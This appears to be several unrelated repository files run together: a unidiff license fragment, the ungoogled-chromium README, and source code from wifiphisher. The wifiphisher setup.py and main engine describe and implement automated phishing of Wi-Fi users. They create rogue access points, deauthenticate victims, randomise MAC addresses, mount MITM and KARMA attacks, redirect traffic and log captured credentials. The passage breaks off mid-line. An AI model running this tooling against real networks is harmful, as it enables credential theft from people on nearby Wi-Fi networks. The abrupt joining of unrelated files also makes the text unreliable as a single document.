copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. __version__ = '0.5.5' File: devutils/third_party/unidiff/errors.py # -*- coding: utf-8 -*- # The MIT License (MIT) # Copyright (c) 2014-2017 Matias Bordese # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. """Errors and exceptions raised by the package.""" from __future__ import unicode_literals class UnidiffParseError(Exception): """Exception when parsing the unified diff data."""
# ungoogled-chromium *A lightweight approach to removing Google web service dependency* **Help is welcome!** See the [docs/contributing.md](docs/contributing.md) document for more information. ## Objectives In descending order of significance (i.e. most important objective first): 1. **ungoogled-chromium is Google Chromium, sans dependency on Google web services**. 2. **ungoogled-chromium retains the default Chromium experience as closely as possible**. Unlike other Chromium forks that have their own visions of a web browser, ungoogled-chromium is essentially a drop-in replacement for Chromium. 3. **ungoogled-chromium features tweaks to enhance privacy, control, and transparency**. However, almost all of these features must be manually activated or enabled. For more details, see [Feature Overview](#feature-overview). In scenarios where the objectives conflict, the objective of higher significance should take precedence. ## Content Overview * [Objectives](#objectives) * [Motivation and Philosophy](#motivation-and-philosophy) * [Feature Overview](#feature-overview) * [**Downloads**](#downloads) * [Source Code](#source-code) * [**FAQ**](#faq) * [Building Instructions](#building-instructions) * [Design Documentation](#design-documentation) * [**Contributing, Reporting, Contacting**](#contributing-reporting-contacting) * [Credits](#credits) * [Related Projects](#related-projects) * [License](#license) ## Motivation and Philosophy Without signing in to a Google Account, Chromium does pretty well in terms of security and privacy. However, Chromium still has some dependency on Google web services and binaries. In addition, Google designed Chromium to be easy and intuitive for users, which means they compromise on transparency and control of internal operations. ungoogled-chromium addresses these issues in the following ways: 1. Remove all remaining background requests to any web services while building and running the browser 2. Remove all code specific to Google web services 3. Remove all uses of pre-made binaries from the source code, and replace them with user-provided alternatives when possible. 4. Disable features that inhibit control and transparency, and add or modify features that promote them (these changes will almost always require manual activation or enabling). These features are implemented as configuration flags, patches, and custom scripts. For more details, consult the [Design Documentation](docs/design.md). ## Feature Overview *This section overviews the features of ungoogled-chromium. For more detailed information, it is best to consult the source code.* Contents of this section: * [Key Features](#key-features) * [Enhancing Features](#enhancing-features) * [Borrowed Features](#borrowed-features) * [Supported Platforms and Distributions](#supported-platforms-and-distributions) ### Key Features *These are the core features introduced by ungoogled-chromium.* * Disable functionality specific to Google domains (e.g. Google Host Detector, Google URL Tracker, Google Cloud Messaging, Google Hotwording, etc.) * This includes disabling [Safe Browsing](https://en.wikipedia.org/wiki/Google_Safe_Browsing). Consult [the FAQ for the rationale](https://ungoogled-software.github.io/ungoogled-chromium-wiki/faq#why-is-safe-browsing-disabled). * Block internal requests to Google at runtime. This feature is a fail-safe measure for the above, in case Google changes or introduces new components that our patches do not disable. This feature is implemented by replacing many Google web domains in the source code with non-existent alternatives ending in `qjz9zk` (known as domain substitution; [see docs/design.md](docs/design.md#source-file-processors) for details), then [modifying Chromium to block its own requests with such domains](patches/core/ungoogled-chromium/block-trk-and-subdomains.patch). In other words, no connections are attempted to the `qjz9zk` domain. * Strip binaries from the source code (known as binary pruning; [see docs/design.md](docs/design.md#source-file-processors) for details) ### Enhancing Features *These are the non-essential features introduced by ungoogled-chromium.* * Add many new command-line switches and `chrome://flags` entries to configure new features (which are disabled by default). See [docs/flags.md](docs/flags.md) for the exhaustive list. * Add *Suggestions URL* text field in the search engine editor (`chrome://settings/searchEngines`) for customizing search engine suggestions. * Add more URL schemes allowed to save page schemes. * Add Omnibox search provider "No Search" to allow disabling of searching * Add a custom cross-platform build configuration and packaging wrapper for Chromium. It currently supports many Linux distributions, macOS, and Windows. (See [docs/design.md](docs/design.md) for details on the system.) * Force all pop-ups into tabs * Disable automatic formatting of URLs in Omnibox (e.g. stripping `http://`, hiding certain parameters) * Disable intranet redirect detector (extraneous DNS requests) * This breaks captive portal detection, but captive portals still work. * (Iridium Browser feature change) Prevent URLs with the `trk:` scheme from connecting to the Internet * Also prevents any URLs with the top-level domain `qjz9zk` (as used in domain substitution) from attempting a connection. * (Windows-specific) Do not set the Zone Identifier on downloaded files ### Borrowed Features In addition to the features introduced by ungoogled-chromium, ungoogled-chromium selectively borrows many features from the following projects (in approximate order of significance): * [Inox patchset](https://github.com/gcarq/inox-patchset) * [Bromite](https://github.com/bromite/bromite) * [Debian](https://tracker.debian.org/pkg/chromium) * [Iridium Browser](https://iridiumbrowser.de/) ### Supported Platforms and Distributions [See docs/platforms.md for a list of supported platforms](docs/platforms.md). Other platforms are discussed and tracked in this repository's Issue Tracker. Learn more about using the Issue Tracker under the section [Contributing, Reporting, Contacting](#contributing-reporting-contacting). ## Downloads ### Automated or maintained builds ungoogled-chromium is available in the following **software repositories**: * Arch: Available in AUR & OBS, [see instructions in ungoogled-chromium-archlinux](https://github.com/ungoogled-software/ungoogled-chromium-archlinux) * Debian & Ubuntu: Available in OBS, find your [distribution specific instructions](https://github.com/ungoogled-software/ungoogled-chromium-debian) in the Installing section * Fedora: Available in [COPR](https://copr.fedorainfracloud.org/coprs/) as [`wojnilowicz/ungoogled-chromium`](https://copr.fedorainfracloud.org/coprs/wojnilowicz/ungoogled-chromium/). Also available in [RPM Fusion](https://rpmfusion.org/Configuration) as `chromium-browser-privacy` (outdated). * Gentoo: Available in [`::pf4public`](https://github.com/PF4Public/gentoo-overlay) overlay as [`ungoogled-chromium`](https://github.com/PF4Public/gentoo-overlay/tree/master/www-client/ungoogled-chromium) and [`ungoogled-chromium-bin`](https://github.com/PF4Public/gentoo-overlay/tree/master/www-client/ungoogled-chromium-bin) ebuilds * [OpenMandriva](https://openmandriva.org/) includes ungoogled-chromium as its main browser. The `chromium` package includes all ungoogling patches. * macOS: Available in [Homebrew](https://brew.sh/) as [`eloston-chromium`](https://formulae.brew.sh/cask/eloston-chromium). Just run `brew install --cask eloston-chromium`. Chromium will appear in your `/Applications` directory. If your GNU/Linux distribution is not listed, there are distro-independent builds available via the following **package managers**: * Flatpak: Available [in the Flathub repo](https://flathub.org/apps/details/io.github.ungoogled_software.ungoogled_chromium) as `io.github.ungoogled_software.ungoogled_chromium` * GNU Guix: Available as `ungoogled-chromium` * NixOS/nixpkgs: Available as `ungoogled-chromium` ### Third-party binaries If your operating system is not listed above, you can also try to [**Download binaries from here**](https://ungoogled-software.github.io/ungoogled-chromium-binaries/) *NOTE: These binaries are provided by anyone who are willing to build and submit them. Because these binaries are not necessarily [reproducible](https://reproducible-builds.org/), authenticity cannot be guaranteed; In other words, there is always a non-zero probability that these binaries may have been tampered with. In the unlikely event that this has happened to you, please [report it in a new issue](#contributing-reporting-contacting).* These binaries are known as **contributor binaries**. ## Source Code This repository only contains the common code for all platforms; it does not contain all the configuration and scripts necessary to build ungoogled-chromium. Most users will want to use platform-specific repos, where all the remaining configuration and scripts are provided for specific platforms: [**Find the repo for a specific platform here**](docs/platforms.md). If you wish to include ungoogled-chromium code in your own build process, consider using [the tags in this repo](https://github.com/ungoogled-software/ungoogled-chromium/tags). These tags follow the format `{chromium_version}-{revision}` where * `chromium_version` is the version of Chromium used in `x.x.x.x` format, and * `revision` is a number indicating the version of ungoogled-chromium for the corresponding Chromium version. Additionally, most platform-specific repos extend their tag scheme upon this one. **Building the source code**: [See docs/building.md](docs/building.md) ### Mirrors List of mirrors: * [Codeberg](https://codeberg.org): [main repo](https://codeberg.org/ungoogled-software/ungoogled-chromium) and [ungoogled-software](https://codeberg.org/ungoogled-software) ## FAQ [See the frequently-asked questions (FAQ) on the Wiki](https://ungoogled-software.github.io/ungoogled-chromium-wiki/faq) ## Building Instructions [See docs/building.md](docs/building.md) ## Design Documentation [See docs/design.md](docs/design.md) ## Contributing, Reporting, Contacting * For reporting and contacting, see [SUPPORT.md](SUPPORT.md) * If you're willing to help, check out the [Issue Tracker](https://github.com/ungoogled-software/ungoogled-chromium/issues) and especially issues, which [need help](https://github.com/ungoogled-software/ungoogled-chromium/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22) * For contributing (e.g. how to help, submitting changes, criteria for new features), see [docs/contributing.md](docs/contributing.md) * If you have some small contributions that don't fit our criteria, consider adding them to [ungoogled-software/contrib](https://github.com/ungoogled-software/contrib) or [our Wiki](https://github.com/ungoogled-software/ungoogled-chromium-wiki) instead. ## Credits * [The Chromium Project](https://www.chromium.org/) * [Inox patchset](https://github.com/gcarq/inox-patchset) * [Debian](https://tracker.debian.org/pkg/chromium-browser) * [Bromite](https://github.com/bromite/bromite) * [Iridium Browser](https://iridiumbrowser.de/) * The users for testing and debugging, [contributing code](https://github.com/ungoogled-software/ungoogled-chromium/graphs/contributors), providing feedback, or simply using ungoogled-chromium in some capacity. ## Related Projects List of known projects that fork or use changes from ungoogled-chromium: * [Bromite](https://github.com/bromite/bromite) (Borrows some patches. Features builds for Android) * [ppc64le fork](https://github.com/leo-lb/ungoogled-chromium) (Fork with changes to build for ppc64le CPUs) ## License BSD-3-clause. See [LICENSE](LICENSE)
wifiphisher
bc4a077e090d59b065cf2c65b0ec1890b9eb4698
File: setup.py #!/usr/bin/env python3 r""" _ __ _ _ _ _ (_)/ _(_) | | (_) | | ((.)) __ ___| |_ _ _ __ | |__ _ ___| |__ ___ _ __ | \ \ /\ / / | _| | '_ \| '_ \| / __| '_ \ / _ \ '__| /_\ \ V V /| | | | | |_) | | | | \__ \ | | | __/ | /___\ \_/\_/ |_|_| |_| .__/|_| |_|_|___/_| |_|\___|_| / \ | | |_| Version {} """ import os import sys import shutil import tempfile import distutils.sysconfig import distutils.ccompiler from distutils.errors import CompileError, LinkError from setuptools import Command, find_packages, setup from textwrap import dedent import wifiphisher.common.constants as constants try: raw_input # Python 2 sys.exit("Please use Python 3 to install Wifiphisher.") except NameError: pass # Python 3 class CleanCommand(Command): """Custom clean command to tidy up the project root.""" user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): os.system('rm -vrf ./build ./dist ./*.pyc ./*.tgz ./*.egg-info') # code for checking if libnl-dev and libnl-genl-dev exist LIBNL_CODE = dedent(""" #include <netlink/netlink.h> #include <netlink/genl/genl.h> int main(int argc, char* argv[]) { struct nl_msg *testmsg; testmsg = nlmsg_alloc(); nlmsg_free(testmsg); return 0; } """) # code for checking if openssl library exist OPENSSL_CODE = dedent(""" #include <openssl/ssl.h> #include <openssl/err.h> int main(int argc, char* argv[]) { SSL_load_error_strings(); return 0; } """) LIBNAME_CODE_DICT = { "netlink": LIBNL_CODE, "openssl": OPENSSL_CODE } def check_required_library(libname, libraries=None, include_dir=None): """ Check if the required shared library exists :param libname: The name of shared library :type libname: str :return True if the required shared lib exists else false :rtype: bool """ build_success = True tmp_dir = tempfile.mkdtemp(prefix='tmp_' + libname + '_') bin_file_name = os.path.join(tmp_dir, 'test_' + libname) file_name = bin_file_name + '.c' with open(file_name, 'w') as filep: filep.write(LIBNAME_CODE_DICT[libname]) compiler = distutils.ccompiler.new_compiler() distutils.sysconfig.customize_compiler(compiler) try: compiler.link_executable( compiler.compile([file_name], include_dirs=include_dir), bin_file_name, libraries=libraries, ) except CompileError: build_success = False except LinkError: build_success = False finally: shutil.rmtree(tmp_dir) if build_success: return True err_msg = "The development package for " + \ libname + " is required " + \ "for the compilation of roguehostapd. " + \ "Please install it and " + \ "rerun the script (e.g. on Debian-based systems " \ "run: apt-get install " if libname == "openssl": err_msg += "libssl-dev" else: err_msg += "libnl-3-dev libnl-genl-3-dev" sys.exit(err_msg) def check_dnsmasq(): """ Try to install dnsmasq on host machine if not present. :return: None :rtype: None """ if not os.path.isfile("/usr/sbin/dnsmasq"): sys.exit("dnsmasq not found in /usr/sbin/dnsmasq. " + "Please install dnsmasq and rerun the script " + "(e.g. on Debian-based systems: " + "apt-get install dnsmasq)") # setup settings NAME = "wifiphisher" AUTHOR = "sophron" AUTHOR_EMAIL = "[email protected]" URL = "https://github.com/wifiphisher/wifiphisher" DESCRIPTION = "Automated phishing attacks against Wi-Fi networks" LICENSE = "GPL" KEYWORDS = ["wifiphisher", "evil", "twin", "phishing"] PACKAGES = find_packages(exclude=["docs", "tests"]) INCLUDE_PACKAGE_DATA = True VERSION = "1.4" CLASSIFIERS = ["Development Status :: 5 - Production/Stable", "License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)", "Natural Language :: English", "Operating System :: Unix", "Programming Language :: Python :: 2", "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 2 :: Only", "Topic :: Security", "Topic :: System :: Networking", "Intended Audience :: End Users/Desktop", "Intended Audience :: System Administrators", "Intended Audience :: Information Technology"] ENTRY_POINTS = {"console_scripts": ["wifiphisher = wifiphisher.pywifiphisher:run"]} INSTALL_REQUIRES = ["pbkdf2", "scapy", "tornado>=5.0.0", "roguehostapd", "pyric"] DEPENDENCY_LINKS = \ ["http://github.com/wifiphisher/roguehostapd/tarball/master#egg=roguehostapd-1.9.0", \ "http://github.com/sophron/pyric/tarball/master#egg=pyric-0.5.0"] CMDCLASS = {"clean": CleanCommand,} LIB_NL3_PATH = '/usr/include/libnl3' LIB_SSL_PATH = '/usr/include/openssl' check_dnsmasq() check_required_library("netlink", ["nl-3", "nl-genl-3"], [LIB_NL3_PATH]) check_required_library("openssl", ["ssl"], [LIB_SSL_PATH]) shutil.rmtree('tmp') # run setup setup(name=NAME, author=AUTHOR, author_email=AUTHOR_EMAIL, description=DESCRIPTION, license=LICENSE, keywords=KEYWORDS, packages=PACKAGES, include_package_data=INCLUDE_PACKAGE_DATA, version=VERSION, entry_points=ENTRY_POINTS, install_requires=INSTALL_REQUIRES, dependency_links=DEPENDENCY_LINKS, classifiers=CLASSIFIERS, url=URL, cmdclass=CMDCLASS) print(__doc__.format(VERSION)) # print the docstring located at the top of this file File: wifiphisher/__init__.py File: wifiphisher/pywifiphisher.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- # pylint: skip-file import argparse import curses import fcntl import logging import logging.config import os import signal import socket import struct import subprocess import sys import time from shutil import copyfile from subprocess import PIPE, Popen, check_output from threading import Thread import wifiphisher.common.accesspoint as accesspoint import wifiphisher.common.extensions as extensions import wifiphisher.common.firewall as firewall import wifiphisher.common.globals as universal import wifiphisher.common.interfaces as interfaces import wifiphisher.common.macmatcher as macmatcher import wifiphisher.common.opmode as opmode import wifiphisher.common.phishinghttp as phishinghttp import wifiphisher.common.phishingpage as phishingpage import wifiphisher.common.recon as recon import wifiphisher.common.tui as tui import wifiphisher.common.victim as victim from six.moves import range, input from wifiphisher.common.constants import (BIRTHDAY, CHANNEL, DEAUTH_EXTENSION, DEFAULT_EXTENSIONS, DEV, DN, G, HANDSHAKE_VALIDATE_EXTENSION, INTERFERING_PROCS, KNOWN_BEACONS_EXTENSION, LOGGING_CONFIG, LURE10_EXTENSION, MAC_PREFIX_FILE, NETWORK_GW_IP, NEW_YEAR, O, PORT, R, ROGUEHOSTAPDINFO, SSL_PORT, T, W, WEBSITE, WPSPBC) logger = logging.getLogger(__name__) def parse_args(): # Create the arguments parser = argparse.ArgumentParser() # Interface selection parser.add_argument( "-i", "--interface", help=("Manually choose an interface that supports both AP and monitor " + "modes for spawning the rogue AP as well as mounting additional " + "Wi-Fi attacks from Extensions (i.e. deauth). " + "Example: -i wlan1")) parser.add_argument( "-eI", "--extensionsinterface", help=("Manually choose an interface that supports monitor mode for " + "deauthenticating the victims. " + "Example: -eI wlan1")) parser.add_argument( "-aI", "--apinterface", type=opmode.validate_ap_interface, help=("Manually choose an interface that supports AP mode for " + "spawning the rogue AP. " + "Example: -aI wlan0")) parser.add_argument( "-iI", "--internetinterface", help=("Choose an interface that is connected on the Internet" + "Example: -iI ppp0")) parser.add_argument( "-pI", "--protectinterface", nargs='+', help=("Specify the interface(s) that will have their connection protected (i.e. NetworkManager will be prevented from controlling them). " + "Example: -pI wlan1 wlan2")) parser.add_argument( "-mI", "--mitminterface", help=("Choose an interface that is connected on the Internet in order to perform a MITM attack. All other interfaces will be protected." + "Example: -mI wlan1")) # MAC address randomization parser.add_argument( "-iAM", "--mac-ap-interface", help=("Specify the MAC address of the AP interface")) parser.add_argument( "-iEM", "--mac-extensions-interface", help=("Specify the MAC address of the extensions interface")) parser.add_argument( "-iNM", "--no-mac-randomization", help=("Do not change any MAC address"), action='store_true') parser.add_argument( "-kN", "--keepnetworkmanager", action='store_true', help=("Do not kill NetworkManager")) parser.add_argument( "-nE", "--noextensions", help=("Do not load any extensions."), action='store_true') parser.add_argument( "-nD", "--nodeauth", help=("Skip the deauthentication phase."), action='store_true') parser.add_argument( "-dC", "--deauth-channels", nargs="+", type=int, help=("Channels to deauth. " + "Example: --deauth-channels 1,3,7")) parser.add_argument( "-e", "--essid", help=("Enter the ESSID of the rogue Access Point. " + "This option will skip Access Point selection phase. " + "Example: --essid 'Free WiFi'")) parser.add_argument( "-dE", "--deauth-essid", help=("Deauth all the BSSIDs in the WLAN with that ESSID.")) parser.add_argument( "-p", "--phishingscenario", help=("Choose the phishing scenario to run." + "This option will skip the scenario selection phase. " + "Example: -p firmware_upgrade")) parser.add_argument( "-pK", "--presharedkey", help=("Add WPA/WPA2 protection on the rogue Access Point. " + "Example: -pK s3cr3tp4ssw0rd")) parser.add_argument( "-hC", "--handshake-capture", help=("Capture of the WPA/WPA2 handshakes for verifying passphrase. " + "Requires cowpatty. " + "Example : -hC capture.pcap")) parser.add_argument( "-qS", "--quitonsuccess", help=("Stop the script after successfully retrieving one pair of " "credentials"), action='store_true') parser.add_argument( "-lC", "--lure10-capture", help=("Capture the BSSIDs of the APs that are discovered during " "AP selection phase. This option is part of Lure10 attack."), action='store_true') parser.add_argument( "-lE", "--lure10-exploit", help=("Fool the Windows Location Service of nearby Windows users " "to believe it is within an area that was previously captured " "with --lure10-capture. Part of the Lure10 attack.")) parser.add_argument( "--logging", help="Log activity to file", action="store_true") parser.add_argument( "-dK", "--disable-karma", help="Disables KARMA attack", action="store_true") parser.add_argument( "-lP", "--logpath", default=None, help="Determine the full path of the logfile.") parser.add_argument( "-cP", "--credential-log-path", help="Determine the full path of the file that will store any captured credentials", default=None) parser.add_argument( "--payload-path", help=("Payload path for scenarios serving a payload")) parser.add_argument("-cM", "--channel-monitor", help="Monitor if target access point changes the channel.", action="store_true") parser.add_argument("-wP", "--wps-pbc", help="Monitor if the button on a WPS-PBC Registrar is pressed.", action="store_true") parser.add_argument("-wAI", "--wpspbc-assoc-interface", help="The WLAN interface used for associating to the WPS AccessPoint.", ) parser.add_argument( "-kB", "--known-beacons", help="Broadcast a number of beacon frames advertising popular WLANs", action='store_true') parser.add_argument( "-fH", "--force-hostapd", help="Force the usage of hostapd installed in the system", action='store_true') parser.add_argument("-pPD", "--phishing-pages-directory", help="Search for phishing pages in this location") parser.add_argument( "--dnsmasq-conf", help="Determine the full path of a custom dnmasq.conf file", default='/tmp/dnsmasq.conf') parser.add_argument( "-pE", "--phishing-essid", help="Determine the ESSID you want to use for the phishing page") return parser.parse_args() VERSION = "1.4GIT" args = parse_args() APs = {} # for listing APs def setup_logging(args): """ Setup the logging configurations """ root_logger = logging.getLogger() # logging setup if args.logging: if args.logpath: LOGGING_CONFIG['handlers']['file']['filename'] = args.logpath logging.config.dictConfig(LOGGING_CONFIG) should_roll_over = False # use root logger to rotate the log file if os.path.getsize(LOGGING_CONFIG['handlers']['file']['filename']) > 0: should_roll_over = os.path.isfile(LOGGING_CONFIG['handlers']['file']['filename']) should_roll_over and root_logger.handlers[0].doRollover() logger.info("Starting Wifiphisher") def set_ip_fwd(): """ Set kernel variables. """ Popen(['sysctl', '-w', 'net.ipv4.ip_forward=1'], stdout=DN, stderr=PIPE) def set_route_localnet(): """ Set kernel variables. """ Popen( ['sysctl', '-w', 'net.ipv4.conf.all.route_localnet=1'], stdout=DN, stderr=PIPE) def set_channel_range(): """ Set channel range accordingly. """ region = time.tzname[time.daylight] if "JST" in region: print('[' + G + '+' + W + "] " + \ "JST timezone detected. " + \ "Setting channel range to 1-14") universal.ALL_2G_CHANNELS = list(range(1,15)) return print('[' + G + '+' + W + "] " + \ "Timezone detected. " + \ "Setting channel range to 1-13") universal.ALL_2G_CHANNELS = list(range(1,14)) return def kill_interfering_procs(): """ Kill the interfering processes that may interfere the wireless card :return None :rtype None ..note: The interfering processes are referenced by airmon-zc. """ # stop the NetworkManager related services # incase service is not installed catch OSError try: subprocess.Popen( ['service', 'network-manager', 'stop'], stdout=subprocess.PIPE, stderr=DN) subprocess.Popen( ['service', 'NetworkManager', 'stop'], stdout=subprocess.PIPE, stderr=DN) subprocess.Popen( ['service', 'avahi-daemon', 'stop'], stdout=subprocess.PIPE, stderr=DN) except OSError: pass # Kill any possible programs that may interfere with the wireless card proc = Popen(['ps', '-A'], stdout=subprocess.PIPE) output = proc.communicate()[0] # total processes in the system sys_procs = output.splitlines() # loop each interfering processes and find if it is running for interfering_proc in INTERFERING_PROCS: for proc in sys_procs: # kill all the processes name equal to interfering_proc if interfering_proc in proc.decode('utf-8'): pid = int(proc.split(None, 1)[0]) print('[' + G + '+' + W + "] Sending SIGKILL to " +\ interfering_proc) os.kill(pid, signal.SIGKILL) class WifiphisherEngine: def __init__(self): self.mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE) self.network_manager = interfaces.NetworkManager() self.template_manager = phishingpage.TemplateManager() self.access_point = accesspoint.AccessPoint() self.fw = firewall.Fw() self.em = extensions.ExtensionManager(self.network_manager) self.opmode = opmode.OpMode() self.victim = victim.Victims() def stop(self): if DEV: print("[" + G + "+" + W + "] Show your support!") print("[" + G + "+" + W + "] Follow us: https://twitter.com/wifiphisher") print("[" + G + "+" + W + "] Like us: https://www.facebook.com/Wifiphisher") print("[" + G + "+" + W + "] Captured credentials:") for cred in phishinghttp.creds: logger.info("Credentials: %s", cred) print(cred) # EM depends on Network Manager. # It has to shutdown first. self.em.on_exit() # AP depends on NM too. self.access_point.on_exit() try: self.network_manager.on_exit() except interfaces.InvalidMacAddressError as err: print(("[{0}!{1}] {2}").format(R, W, err)) self.template_manager.on_exit() self.fw.on_exit() if os.path.isfile('/tmp/wifiphisher-webserver.tmp'): os.remove('/tmp/wifiphisher-webserver.tmp') print('[' + R + '!' + W + '] Closing') sys.exit(0) def start(self): today = time.strftime("%Y-%m-%d %H:%M") print('[' + T + '*' + W + '] Starting Wifiphisher %s ( %s ) at %s' % (VERSION, WEBSITE, today)) # Show some emotions. if BIRTHDAY in today: print('[' + T + '*' + W + \ '] Wifiphisher was first released on this day in 2015! ' \ 'Happy birthday!') if NEW_YEAR in today: print('[' + T + '*' + W + \ '] Happy new year!') # First of - are you root? if os.geteuid(): logger.error("Non root user detected") sys.exit('[' + R + '-' + W + '] Please run as root') # Set the channel range set_channel_range() # Parse args global args, APs args = parse_args() # setup the logging configuration setup_logging(args) if args.phishing_pages_directory: # check if the path ends with the proper separator, if not add it # this is to prevent problems when joining path with string concatenation if args.phishing_pages_directory[-1] != os.path.sep: args.phishing_pages_directory += os.path.sep phishing_pages_dir = args.phishing_pages_directory logger.info("Searching for scenario in %s" % phishing_pages_dir) if args.dnsmasq_conf: self.access_point.dns_conf_path = args.dnsmasq_conf if args.credential_log_path: phishinghttp.credential_log_path = args.credential_log_path # Handle the chosen interface as an internetInterface in order to # leverage existing functionality. # In case `--internetinterface` is also used it will be overwritten with a warning. # # There are two cases for a provided args.mitminterface: # - In case args.internetinterface is also provided, swap their values so that we can # leverage args.internetinterface functionality but at the same time keep the fact that # it was provided as an argument, in order to be able to warn the user. # # - In case no args.internetinterface is provided, manually set args.mitminterface to a # specific string to account for further checks. if args.mitminterface: if args.internetinterface: args.internetinterface, args.mitminterface = args.mitminterface, args.internetinterface else: args.internetinterface = args.mitminterface args.mitminterface = "handledAsInternetInterface" # Initialize the operation mode manager self.opmode.initialize(args) # Set operation mode self.opmode.set_opmode(args, self.network_manager) self.network_manager.start(args) # TODO: We should have more checks here: # Is anything binded to our HTTP(S) ports? # Maybe we should save current iptables rules somewhere # get interfaces for monitor mode and AP mode and set the monitor interface # to monitor mode. shutdown on any errors try: if self.opmode.internet_sharing_enabled(): self.network_manager.internet_access_enable = True # Set up an automatic MITM attack if `-mI/--mitminterface` was already present. # # We are already handling the chosen interface as an internetInterface. # Here we are also protecting the rest of the detected interfaces. # (i.e. prevent NetworkManager from managing them) # The value of args.mitminterface does not concern us, unless empty. We will be performing # all operations using args.internetinterface instead. if args.mitminterface: for interface in self.network_manager._name_to_object: if interface != args.internetinterface: self.network_manager.nm_unmanage(interface) if self.network_manager.is_interface_valid( args.internetinterface, "internet"): internet_interface = args.internetinterface if interfaces.is_wireless_interface(internet_interface): try: self.network_manager.unblock_interface( internet_interface) except KeyError: # TODO: Find a workaround for managing blocked adapters that do not support nl80211 # Calling unblock on internet interfaces might return a `Key Error` if it does not # support nl80211. This will be a problem if the interface is blocked as it cannot # be unblocked automatically. Let the user know with a warning. logger.warning("Interface {} does not support 'nl80211'. In case it is blocked,\ you must unblock it manually".format(internet_interface)) logger.info("Selecting %s interface for accessing internet", args.internetinterface) # check if the interface for WPS is valid if self.opmode.assoc_enabled(): if self.network_manager.is_interface_valid( args.wpspbc_assoc_interface, "WPS"): logger.info("Selecting %s interface for WPS association", args.wpspbc_assoc_interface) if self.opmode.extensions_enabled(): if args.extensionsinterface and args.apinterface: if self.network_manager.is_interface_valid( args.extensionsinterface, "monitor"): mon_iface = args.extensionsinterface self.network_manager.unblock_interface(mon_iface) if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: mon_iface, ap_iface = self.network_manager.get_interface_automatically( ) # display selected interfaces to the user logger.info( "Selecting {} for deauthentication and {} for the rogue Access Point" .format(mon_iface, ap_iface)) print(( "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication " "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the " "rogue Access Point").format(G, W, mon_iface, ap_iface)) if not self.opmode.extensions_enabled(): if args.apinterface: if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: ap_iface = self.network_manager.get_interface(True, False) mon_iface = ap_iface print(( "[{0}+{1}] Selecting {0}{2}{1} interface for creating the " "rogue Access Point").format(G, W, ap_iface)) logger.info("Selecting {} interface for rogue Access Point" .format(ap_iface)) # Randomize MAC if not args.no_mac_randomization: try: new_mac = self.network_manager.set_interface_mac(ap_iface, args.mac_ap_interface) logger.info("Changing {} MAC address to {}".format( ap_iface, new_mac)) print("[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format( G, W, ap_iface, new_mac)) if mon_iface != ap_iface: new_mac = self.network_manager.set_interface_mac(mon_iface, args.mac_extensions_interface) logger.info("Changing {} MAC address to {}".format( mon_iface, new_mac)) print("[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format( G, W, ap_iface, new_mac)) except interfaces.InvalidMacAddressError as err: print(("[{0}!{1}] {2}").format(R, W, err)) # make sure interfaces are not blocked logger.info("Unblocking interfaces") self.network_manager.unblock_interface(ap_iface) self.network_manager.unblock_interface(mon_iface) # set monitor mode only when --essid is not given if self.opmode.extensions_enabled() or args.essid is None: self.network_manager.set_interface_mode(mon_iface, "monitor") except (interfaces.InvalidInterfaceError, interfaces.InterfaceCantBeFoundError, interfaces.InterfaceManagedByNetworkManagerError) as err: logging.exception("The following error has occurred:") print(("[{0}!{1}] {2}").format(R, W, err)) time.sleep(1) self.stop() if args.protectinterface: for interface in args.protectinterface: self.network_manager.nm_unmanage(interface) if not args.internetinterface and not args.keepnetworkmanager: kill_interfering_procs() logger.info("Killing all interfering processes") if self.opmode.internet_sharing_enabled(): self.fw.nat(ap_iface, args.internetinterface) set_ip_fwd() else: self.fw.redirect_requests_localhost() set_route_localnet() print('[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables') time.sleep(1) if args.essid: essid = args.essid channel = str(CHANNEL) # We don't have target attacking MAC in frenzy mode # That is we deauth all the BSSIDs that being sniffed target_ap_mac = None enctype = None else: # let user choose access point # start the monitor adapter self.network_manager.up_interface(mon_iface) ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher, self.network_manager, args) ap_sel_object = tui.TuiApSel() access_point = curses.wrapper(ap_sel_object.gather_info, ap_info_object) # if the user has chosen a access point continue # 